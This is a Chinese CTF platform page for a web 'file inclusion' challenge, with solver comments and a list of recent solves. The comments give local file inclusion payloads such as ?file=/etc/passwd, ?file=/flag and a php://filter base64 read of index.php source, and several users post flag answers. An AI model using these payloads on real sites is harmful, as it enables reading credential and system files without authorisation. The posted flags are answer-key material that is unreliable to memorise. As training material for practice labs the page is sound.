文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 12271
提  示:
描  述:
flag{}
评论
107zsm 2年前

打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag

回复 11

小夫 2年前

file=/flag

回复 0

rightstar 2年前

flag{a1ad1a8522261e6b9abf21e9bd6ef675}

回复 0

sibeil 2年前

flag{b23328bbf165641292d9871be279459a}

回复 0

wxy1343 2年前

flag{a15320afe0f7ad00fb16135d7456a9e1}

回复 0

mircle 2年前

flag{4911bd2afb90b2abf40a02b45e6979ac}

回复 0

xclay 2年前

flag{a48aed21035fc48b5003c3f615fad2b0}

回复 0

tardigrade 2年前

http://xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

嵌入式学的CTF 2年前

PHP伪协议详解https://blog.csdn.net/cosmoslin/article/details/120695429

回复 0

xiaoxiao972521 2年前

????直接/flag就出来了?

回复 3

WriteUp

image
harry

2 金币

评分(11)

解题动态

521078 攻破了该题 1小时前
wz666 攻破了该题 2小时前
millim 攻破了该题 2小时前
HKzhou 攻破了该题 7小时前
lin666 攻破了该题 10小时前
foxkiller 攻破了该题 1天前
爱吃馒头 攻破了该题 1天前
jhon 攻破了该题 1天前
desireart 攻破了该题 1天前
暗A166668 攻破了该题 2天前
吴王饭差 攻破了该题 2天前
欲语泪先流 攻破了该题 2天前
统计系1008 攻破了该题 3天前
白六真的6 攻破了该题 3天前
ZQCblack 攻破了该题 3天前
baotou91 攻破了该题 3天前
2021060287 攻破了该题 4天前
5326 攻破了该题 4天前
jkljkl 攻破了该题 4天前
Adwuwuuuuc 攻破了该题 4天前
问题反馈